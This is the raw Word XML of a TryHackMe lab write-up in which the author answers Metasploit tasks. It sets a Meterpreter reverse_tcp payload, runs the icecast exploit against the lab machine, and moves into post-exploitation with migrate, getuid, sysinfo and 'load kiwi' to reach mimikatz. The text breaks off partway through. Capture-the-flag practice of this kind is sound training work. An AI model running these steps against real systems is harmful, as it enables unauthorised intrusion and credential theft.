          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. This is the short way to use modules returned by search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A56F868" w14:textId="3E0166B5" w:rsidR="007918CB" w:rsidRPr="006F1554" w:rsidRDefault="007918CB" w:rsidP="007918CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56CE13D8" wp14:editId="3ADC1EC9">
            <wp:extent cx="4539270" cy="255236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54401" cy="2560877"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="299157FF" w14:textId="72CA8FAA" w:rsidR="00F01BCF" w:rsidRPr="007918CB" w:rsidRDefault="00F01BCF"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Next, let's set the payload using this command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. In this way, we can modify which payloads we want to use with our exploits. Additionally, let's run this command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>set LHOST YOUR_IP_ON_TRYHACKME</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. You might have to check your IP using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>ip addr</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, it will likely be your </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tun0</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF65EB9" w14:textId="0270BC6B" w:rsidR="007918CB" w:rsidRPr="006F1554" w:rsidRDefault="007918CB" w:rsidP="007918CB">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0D826FC6" wp14:editId="671487D6">
            <wp:extent cx="4160997" cy="2339671"/>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8871" cy="2344099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B68A9D" w14:textId="52169F58" w:rsidR="00F01BCF" w:rsidRPr="000D5F2B" w:rsidRDefault="00F01BCF"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Let's go ahead and return to our previous exploit, run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>use icecast</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> to select it again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBCA8F" w14:textId="14A65A8F" w:rsidR="000D5F2B" w:rsidRPr="006F1554" w:rsidRDefault="000D5F2B" w:rsidP="000D5F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AC48FA0" wp14:editId="1B87D174">
            <wp:extent cx="4232536" cy="237989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53649" cy="2391769"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49394BD7" w14:textId="447B1BB8" w:rsidR="00F01BCF" w:rsidRPr="000D5F2B" w:rsidRDefault="00F01BCF"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One last step before we can run our exploit. Run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>set RHOSTS MACHINE_IP</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> to tell Metasploit which target to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E32DBF" w14:textId="22173779" w:rsidR="000D5F2B" w:rsidRPr="006F1554" w:rsidRDefault="000D5F2B" w:rsidP="000D5F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5EF6F0" wp14:editId="7E637DC1">
            <wp:extent cx="4020421" cy="226062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23399" cy="2262303"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B433D8" w14:textId="3B0686FA" w:rsidR="00F01BCF" w:rsidRPr="000D5F2B" w:rsidRDefault="00F01BCF" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Once you're set those variables correctly, run the exploit now via either the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> or the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>run -j</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> to run this as a job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047509AE" w14:textId="442E4521" w:rsidR="000D5F2B" w:rsidRPr="006F1554" w:rsidRDefault="000D5F2B" w:rsidP="000D5F2B">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2649E0EA" wp14:editId="4E5839DD">
            <wp:extent cx="4289100" cy="241170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3022" cy="2413908"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB2163" w14:textId="29B0A4F6" w:rsidR="00F01BCF" w:rsidRPr="000D5F2B" w:rsidRDefault="00F01BCF" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Once we've started this, we can check all of the jobs running on the system by running the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B532C7" w14:textId="14771A93" w:rsidR="000D5F2B" w:rsidRPr="006F1554" w:rsidRDefault="000D5F2B" w:rsidP="000D5F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E6C5AD" wp14:editId="72D357A4">
            <wp:extent cx="4345665" cy="24435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3619" cy="2453604"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E34174" w14:textId="30D62E08" w:rsidR="00F01BCF" w:rsidRPr="000D5F2B" w:rsidRDefault="00F01BCF" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>After we've established our connection in the next task, we can list all of our sessions using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Similarly, we can interact with a target session using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>sessions -i SESSION_NUMBER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0C1B3" w14:textId="074A4170" w:rsidR="000D5F2B" w:rsidRPr="006F1554" w:rsidRDefault="00682F2D" w:rsidP="000D5F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04D8D588" wp14:editId="2FEBC69E">
            <wp:extent cx="4359805" cy="2451459"/>
            <wp:effectExtent l="0" t="0" r="317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0173" cy="2457289"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F645CF" w14:textId="1298A1BA" w:rsidR="00F01BCF" w:rsidRPr="006F1554" w:rsidRDefault="00F01BCF" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04810F27" w14:textId="04B7BBC6" w:rsidR="00F01BCF" w:rsidRPr="00CE0EAF"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First things first, our initial shell/process typically isn't very stable. Let's go ahead and attempt to move to a different process. First, let's list the processes using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. What's the name of the spool service?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00682F2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spoolsv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB4C9C" w14:textId="657D2297" w:rsidR="00CE0EAF" w:rsidRPr="006F1554" w:rsidRDefault="00CE0EAF" w:rsidP="00CE0EAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01A6F8C1" wp14:editId="56588B21">
            <wp:extent cx="4260817" cy="2395799"/>
            <wp:effectExtent l="0" t="0" r="698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8441" cy="2400086"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018B16E" w14:textId="6DE8BCCD" w:rsidR="00E07C87" w:rsidRPr="00CE0EAF"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Let's go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won't work at the current time as we don't have sufficient privileges but we can still try!</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE0EAF" w:rsidRPr="00682F2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00682F2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>igrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764ADD44" w14:textId="609EC828" w:rsidR="00CE0EAF" w:rsidRPr="006F1554" w:rsidRDefault="00CE0EAF" w:rsidP="00CE0EAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73DFC7DC" wp14:editId="1D5C38F4">
            <wp:extent cx="4147691" cy="233219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5769" cy="2336732"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D672362" w14:textId="3BC16926" w:rsidR="00E07C87" w:rsidRPr="0059658A"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Well that migration didn't work, let's find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE0EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB98BF" w14:textId="2F5E7ECC" w:rsidR="0059658A" w:rsidRPr="006F1554" w:rsidRDefault="00AF6684" w:rsidP="0059658A">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0CEABAB1" wp14:editId="5D2B750C">
            <wp:extent cx="4147689" cy="233218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4384" cy="2335954"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2E0FB" w14:textId="00D24A7D" w:rsidR="00E07C87" w:rsidRPr="00116070"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How about finding more information out about the system itself?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00116070">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8058D5" w14:textId="2A7BEC55" w:rsidR="00116070" w:rsidRPr="006F1554" w:rsidRDefault="00116070" w:rsidP="00116070">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B54C870" wp14:editId="2A84ADFC">
            <wp:extent cx="4161536" cy="23399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81572" cy="2351241"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29A953" w14:textId="41651A0F" w:rsidR="00E07C87" w:rsidRPr="00874895"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This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it? </w:t>
      </w:r>
      <w:r w:rsidRPr="00874895">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA57B1A" w14:textId="4B3FD725" w:rsidR="00874895" w:rsidRPr="006F1554" w:rsidRDefault="00874895" w:rsidP="00874895">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
